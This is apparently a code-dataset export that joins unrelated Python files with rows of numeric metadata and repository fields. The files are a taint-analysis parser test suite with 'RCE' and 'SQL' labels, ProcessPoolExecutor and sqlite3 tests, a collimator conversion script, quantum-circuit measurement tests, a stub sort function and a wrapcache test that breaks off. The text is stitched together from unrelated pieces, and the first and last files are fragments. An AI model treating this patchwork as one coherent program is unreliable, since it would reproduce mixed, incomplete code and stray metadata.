SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.other_sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sinks.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("RCE", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared return sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "result",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "RCE",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"kinds": [ { "kind": "RCE" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
def testIgnoreModelsV2(self) -> None:
# Ignore modes.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"modes": [ "Obscure" ]
}
}
""",
expected=[],
)
# Ignore sanitizers.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"global_sanitizer": { "sources": "All" }
}
}
""",
expected=[],
)
# Ignore tito.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"tito": [
{
"port": "formal(value)",
"taint": [
{
"decl": null,
"leaves": [
{ "kind": "LocalReturn", "name": "[instance]", "depth": 0 },
{ "kind": "LocalReturn", "name": "[attribute]", "depth": 0 }
]
}
]
}
]
}
}
""",
expected=[],
)
def testIgnoreModelsV3(self) -> None:
# Ignore modes.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"modes": [ "Obscure" ]
}
}
""",
expected=[],
)
# Ignore sanitizers.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"global_sanitizer": { "sources": "All" }
}
}
""",
expected=[],
)
# Ignore tito.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"tito": [
{
"port": "formal(value)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "LocalReturn",
"return_paths": ["[instance]", "[attribute]"]
}
]
}
]
}
]
}
}
""",
expected=[],
)
| 37.332757
| 88
| 0.281393
| 9,192
| 172,776
| 5.136858
| 0.02698
| 0.080817
| 0.089796
| 0.050998
| 0.966814
| 0.965162
| 0.960799
| 0.955144
| 0.94644
| 0.939218
| 0
| 0.041433
| 0.614316
| 172,776
| 4,627
| 89
| 37.340826
| 0.667152
| 0.011969
| 0
| 0.783831
| 0
| 0.003954
| 0.50082
| 0.014996
| 0
| 0
| 0
| 0.000216
| 0.012522
| 1
| 0.002636
| false
| 0
| 0.001538
| 0
| 0.004833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
78ac9a9d5d89f65ca395f33c0537ada5d6af12a0
| 96
|
py
|
Python
|
tests/__init__.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | 2
|
2020-01-18T10:32:13.000Z
|
2020-01-18T10:34:17.000Z
|
tests/__init__.py
|
markfink/korg
|
6a123031b69896f61fe0007f4a1d5f6f064b6ad9
|
[
"MIT"
] | null | null | null |
import os
def here(p):
return os.path.abspath(os.path.join(os.path.dirname(__file__), p))
| 16
| 70
| 0.697917
| 17
| 96
| 3.705882
| 0.647059
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135417
| 96
| 5
| 71
| 19.2
| 0.759036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
78cacfed10f46dc69a7f2e10fde0582841077022
| 214
|
py
|
Python
|
main.py
|
openhomeschool/sorter1
|
5a4224e85739b5d227de7b74c08dfc3c6f25a7b6
|
[
"MIT"
] | null | null | null |
main.py
|
openhomeschool/sorter1
|
5a4224e85739b5d227de7b74c08dfc3c6f25a7b6
|
[
"MIT"
] | null | null | null |
main.py
|
openhomeschool/sorter1
|
5a4224e85739b5d227de7b74c08dfc3c6f25a7b6
|
[
"MIT"
] | null | null | null |
def sort(words):
# write your code here...
return
print(sort( ['hi', 'bye'] ))
print(sort( ['abc', 'def'] ))
print(sort( ['hi', 'bye', 'def', 'abc'] ))
print(sort( ['add', 'some', 'more', 'words', 'here!'] ))
| 21.4
| 56
| 0.528037
| 29
| 214
| 3.896552
| 0.517241
| 0.318584
| 0.19469
| 0.247788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158879
| 214
| 9
| 57
| 23.777778
| 0.627778
| 0.107477
| 0
| 0
| 0
| 0
| 0.228723
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0.166667
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
15329a447268086d1c10f64723c1d182ed67d28a
| 16,143
|
py
|
Python
|
lccserver/tests/test_utils.py
|
waqasbhatti/lcc-server
|
b8256bf28aee42e628abe27f0203d6f5361fb84b
|
[
"MIT"
] | 3
|
2018-08-24T04:01:36.000Z
|
2021-04-21T16:25:04.000Z
|
lccserver/tests/test_utils.py
|
waqasbhatti/lcc-server
|
b8256bf28aee42e628abe27f0203d6f5361fb84b
|
[
"MIT"
] | 7
|
2018-08-24T11:50:20.000Z
|
2019-03-09T03:58:00.000Z
|
lccserver/tests/test_utils.py
|
waqasbhatti/lcc-server
|
b8256bf28aee42e628abe27f0203d6f5361fb84b
|
[
"MIT"
] | 1
|
2020-06-01T07:55:16.000Z
|
2020-06-01T07:55:16.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''test_utils.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Aug 2018
License: MIT - see the LICENSE file for the full text.
This tests the lccserver.utils module.
'''
import lccserver.utils as lcu
import multiprocessing as mp
from concurrent.futures import as_completed
import time
import random
import sqlite3
import tempfile
import os
import os.path
################
## Basic test ##
################
def initializer_func(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
global i_am_global
i_am_global = test_string
def worker_func(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
global i_am_global
time.sleep(random.randrange(1,3))
return "%s|%s" % (i_am_global, input_param)
def test_ProcExecutor():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func,
initargs=('glob glob glob',)
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
#################################################################
## Test using multiprocessing.current_process() to store stuff ##
#################################################################
def initializer_func_procstorage(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
thisproc = mp.current_process()
thisproc.local_proc_store = test_string
def worker_func_procstorage(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
thisproc = mp.current_process()
time.sleep(random.randrange(1,3))
return "%s|%s" % (thisproc.local_proc_store, input_param)
def test_ProcExecutor_procstorage():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func_procstorage,
initargs=('glob glob glob',)
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func_procstorage, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
################################################################
## Test using the finalizer arg to do stuff when workers exit ##
################################################################
from datetime import datetime
import glob
def initializer_func_finalizer(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
thisproc = mp.current_process()
thisproc.local_proc_store = test_string
def worker_func_finalizer(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
thisproc = mp.current_process()
time.sleep(random.randrange(1,3))
return "%s|%s" % (thisproc.local_proc_store, input_param)
def finalizer_func():
'''
This gets called right before the worker is ready to exit.
'''
thisproc = mp.current_process()
with open('worker-done-%s.txt' % thisproc.name,'w') as outfd:
outfd.write("Yay! I'm done!\n")
outfd.write('worker shutdown called at: %s\n' %
datetime.utcnow().isoformat())
def test_ProcExecutor_finalizer():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func_finalizer,
initargs=('glob glob glob',),
finalizer=finalizer_func,
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func_finalizer, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
with open('executor-shutdown.txt','w') as outfd:
outfd.write('executor shutdown at: %s\n' %
datetime.utcnow().isoformat())
# now we'll check if the result files were generated correctly
worker_results = glob.glob(os.path.join(os.getcwd(),
'worker-done-*.txt'))
assert len(worker_results) == ncpus, "All workers cleaned up correctly"
for wrkres in worker_results:
with open(wrkres,'r') as infd:
assert "Yay! I'm done!" in infd.read(), "Clean up result OK"
os.remove(wrkres)
assert os.path.exists(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
os.remove(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
#############################################
## More involved ProcessPoolExecutor tests ##
#############################################
def database_initializer(database_fpath):
global db_connection
db_connection = sqlite3.connect(database_fpath)
def database_worker(task):
global db_connection
cursor = db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
def test_background_sqlite3():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer,
initargs=(temp_fname,)
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [executor.submit(database_worker,task) for task in tasks]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
###################################################################
## Testing sqlite3 background workers with process-local storage ##
###################################################################
def database_initializer_procstorage(database_fpath):
thisproc = mp.current_process()
thisproc.db_connection = sqlite3.connect(database_fpath)
def database_worker_procstorage(task):
thisproc = mp.current_process()
cursor = thisproc.db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
def test_background_sqlite3_procstorage():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer_procstorage,
initargs=(temp_fname,)
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [
executor.submit(database_worker_procstorage,task) for task in tasks
]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
#############################################
## Testing database closure on worker exit ##
#############################################
def database_initializer_finalizer(database_fpath):
thisproc = mp.current_process()
thisproc.db_connection = sqlite3.connect(database_fpath)
def database_worker_finalizer(task):
thisproc = mp.current_process()
cursor = thisproc.db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
def database_closer_finalizer():
thisproc = mp.current_process()
thisproc.db_connection.close()
try:
thisproc.db_connection.cursor()
except sqlite3.ProgrammingError as e:
with open('worker-done-%s.txt' % thisproc.name,'w') as outfd:
outfd.write(
'database closed successfully: %r at %s\n' %
(e, datetime.utcnow().isoformat())
)
def test_background_sqlite3_finalizer():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer_finalizer,
initargs=(temp_fname,),
finalizer=database_closer_finalizer
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [
executor.submit(database_worker_finalizer,task) for task in tasks
]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
with open('executor-shutdown.txt','w') as outfd:
outfd.write('executor shutdown at: %s\n' %
datetime.utcnow().isoformat())
# now we'll check if the result files were generated correctly
worker_results = glob.glob(os.path.join(os.getcwd(),
'worker-done-*.txt'))
assert len(worker_results) == 4, "All workers cleaned up correctly"
for wrkres in worker_results:
with open(wrkres,'r') as infd:
assert "closed database" in infd.read(), "Clean up result OK"
os.remove(wrkres)
assert os.path.exists(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
os.remove(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
| 27.784854
| 79
| 0.609924
| 1,905
| 16,143
| 5.044619
| 0.135433
| 0.017482
| 0.007492
| 0.022477
| 0.858065
| 0.847138
| 0.844329
| 0.83975
| 0.83975
| 0.830385
| 0
| 0.007742
| 0.231865
| 16,143
| 580
| 80
| 27.832759
| 0.767258
| 0.111503
| 0
| 0.771676
| 0
| 0
| 0.241998
| 0.015116
| 0
| 0
| 0
| 0
| 0.052023
| 1
| 0.057803
| false
| 0.008671
| 0.031792
| 0
| 0.106936
| 0.052023
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1588325c524b8ac318a55a7b399a336ccae7345f
| 1,124
|
py
|
Python
|
tests/data_test_K2/correct_json_colimators.py
|
xsuite/xcol
|
5ca9d49a3a09aeecfa5fc193631ad49f7f582408
|
[
"Apache-2.0"
] | null | null | null |
tests/data_test_K2/correct_json_colimators.py
|
xsuite/xcol
|
5ca9d49a3a09aeecfa5fc193631ad49f7f582408
|
[
"Apache-2.0"
] | null | null | null |
tests/data_test_K2/correct_json_colimators.py
|
xsuite/xcol
|
5ca9d49a3a09aeecfa5fc193631ad49f7f582408
|
[
"Apache-2.0"
] | null | null | null |
from pathlib import Path
import json
import numpy as np
import xobjects as xo
import xcoll as xc
with open(Path(Path.cwd(), 'collimators_B1'), 'r') as fid:
collimators = [ x.strip() for x in fid.readlines()]
for name in collimators:
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'r') as fid:
coll = xc.K2Collimator.from_dict(json.load(fid))
coll.dx *= 1e-3
coll.dy *= 1e-3
coll.dpx *= 1e-3
coll.dpy *= 1e-3
coll.angle *= 180./np.pi
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'w') as fid:
json.dump(coll.to_dict(), fid, cls=xo.JEncoder)
with open(Path(Path.cwd(), 'collimators_B2'), 'r') as fid:
collimators = [ x.strip() for x in fid.readlines()]
for name in collimators:
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'r') as fid:
coll = xc.K2Collimator.from_dict(json.load(fid))
coll.dx *= 1e-3
coll.dy *= 1e-3
coll.dpx *= 1e-3
coll.dpy *= 1e-3
coll.angle *= 180./np.pi
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'w') as fid:
json.dump(coll.to_dict(), fid, cls=xo.JEncoder)
| 34.060606
| 72
| 0.620107
| 182
| 1,124
| 3.796703
| 0.241758
| 0.034732
| 0.081042
| 0.138929
| 0.879884
| 0.879884
| 0.793054
| 0.793054
| 0.793054
| 0.793054
| 0
| 0.028857
| 0.198399
| 1,124
| 32
| 73
| 35.125
| 0.738069
| 0
| 0
| 0.758621
| 0
| 0
| 0.087189
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.172414
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01d27c0d0916d9e453ed46c48e1a524781dec69f
| 810
|
py
|
Python
|
tests/test_measurekey.py
|
minatoyuichiro/Blueqat
|
1be0150ca48bf40527936561d1bf4687dbf435b4
|
[
"Apache-2.0"
] | 357
|
2019-02-24T07:21:03.000Z
|
2022-03-15T22:59:13.000Z
|
tests/test_measurekey.py
|
mdrft/blueqat
|
6c5f26b377bc3ce0d02adec8b9132d70870b3d95
|
[
"Apache-2.0"
] | 35
|
2019-03-29T02:13:09.000Z
|
2021-10-15T02:19:06.000Z
|
tests/test_measurekey.py
|
mdrft/blueqat
|
6c5f26b377bc3ce0d02adec8b9132d70870b3d95
|
[
"Apache-2.0"
] | 49
|
2019-03-09T13:19:40.000Z
|
2022-03-11T08:31:16.000Z
|
from blueqat import Circuit
def test_key0():
assert Circuit().m(key="test")[0].run(shots=10, returns="samples") == [{"test": [0]} for _ in range(10)]
def test_key1():
assert Circuit().x[0].m(key="test")[0].run(shots=10, returns="samples") == [{"test": [1]} for _ in range(10)]
def test_keys():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="b")[0].run(shots=10, returns="samples") == [{"a": [1, 0], "b": [0]} for _ in range(10)]
def test_key_replace():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="a", duplicated="replace")[0].run(shots=10, returns="samples") == [{"a": [0]} for _ in range(10)]
def test_key_append():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="a", duplicated="append")[0].run(shots=10, returns="samples") == [{"a": [1, 0, 0]} for _ in range(10)]
| 38.571429
| 156
| 0.582716
| 144
| 810
| 3.194444
| 0.194444
| 0.069565
| 0.045652
| 0.091304
| 0.815217
| 0.786957
| 0.713043
| 0.613043
| 0.513043
| 0.391304
| 0
| 0.069307
| 0.12716
| 810
| 20
| 157
| 40.5
| 0.58133
| 0
| 0
| 0
| 0
| 0
| 0.091358
| 0
| 0
| 0
| 0
| 0
| 0.454545
| 1
| 0.454545
| true
| 0
| 0.090909
| 0
| 0.545455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
01ed5b041e73a4cd37b04bd9d88472defdab6b4a
| 29
|
py
|
Python
|
quit/__init__.py
|
plewandowska777/QuIT
|
1e1ea4d57e16a6074c123ed01b22ad190384329c
|
[
"MIT"
] | null | null | null |
quit/__init__.py
|
plewandowska777/QuIT
|
1e1ea4d57e16a6074c123ed01b22ad190384329c
|
[
"MIT"
] | 1
|
2022-01-25T17:07:51.000Z
|
2022-01-25T17:07:51.000Z
|
quit/__init__.py
|
plewandowska777/QuIT
|
1e1ea4d57e16a6074c123ed01b22ad190384329c
|
[
"MIT"
] | null | null | null |
def dummy():
return 2137
| 9.666667
| 15
| 0.62069
| 4
| 29
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 0.275862
| 29
| 2
| 16
| 14.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
01edb32b0a33b2b61637012bf80de2b59a87f082
| 12,655
|
py
|
Python
|
tests/test_unitest.py
|
Max1993Liu/wrapcache
|
af30bf3609d82b02060861aa739528005c0f527c
|
[
"MIT"
] | 117
|
2016-01-03T14:41:33.000Z
|
2021-07-06T05:48:30.000Z
|
tests/test_unitest.py
|
Max1993Liu/wrapcache
|
af30bf3609d82b02060861aa739528005c0f527c
|
[
"MIT"
] | 8
|
2016-01-07T04:47:56.000Z
|
2020-11-17T07:16:25.000Z
|
tests/test_unitest.py
|
Max1993Liu/wrapcache
|
af30bf3609d82b02060861aa739528005c0f527c
|
[
"MIT"
] | 26
|
2016-01-04T08:48:22.000Z
|
2021-03-15T10:02:02.000Z
|
#-*-coding: utf-8 -*-
import unittest, time
import sys, random
import wrapcache
from wrapcache.adapter.MemoryAdapter import MemoryAdapter
from wrapcache.adapter.RedisAdapter import RedisAdapter
from wrapcache.database import LruCacheDB
#########################Memory test
class TestMemoryInstance:
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def test_cache(self):
return time.time()
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def test_input_cache(self, i, j):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 10, adapter = MemoryAdapter)
def test_input_order_cache(self, i = 1, j = 's'):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def need_cache_function(self):
time.sleep(2)
print('cache timeout, new...')
return random.randint(1, 100)
class TestMemoryUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestMemoryInstance()
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
